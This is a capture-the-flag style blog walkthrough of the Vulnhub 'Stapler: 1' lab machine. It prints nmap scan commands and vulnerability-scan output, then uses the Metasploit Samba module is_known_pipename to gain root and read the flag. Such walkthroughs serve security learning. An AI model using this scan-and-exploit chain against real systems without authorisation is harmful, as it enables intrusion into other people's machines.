Stapler: 1 Vulnhub Machine Walkthrough

Lets find out the IP first with nmap

nmap 192.168.18.0/24

The IP is 192.168.18.85.

Lets run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.

[email protected]:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp   open   domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:thekelleys:dnsmasq:2.75: 
|       CVE-2019-14513  5.0     https://vulners.com/cve/CVE-2019-14513
|_      CVE-2019-14834  4.3     https://vulners.com/cve/CVE-2019-14834
80/tcp   open   http        PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                    
|       the target web server and sending a partial request. By doing so, it starves 
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.18.85

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds

Didnt find anything interesting from the port 80 web page, nikto and gobuster scan.

samba is running on port 139. Lets try to exploit it before going to ftp.

msfconsole
msf5 > msf5 > use exploit/linux/samba/is_known_pipename

Now set the options

Time to run the exploit. Enter run

We got the root. Now lets read the flag.

cat /root/flag.txt

Finished! Thats all for today.

Published by

Melbin Mathew

I'm Melbin Mathew from Kerala, India. Infosec enthusiast, interested in Bug Hunting, Web App Pentesting and and Blogging. Love learning something new every day. Drop a mail to connect. LinkedIn | Github | Twitter Contact: melbin [-at-] melbin.in

Leave a Reply

Your email address will not be published. Required fields are marked *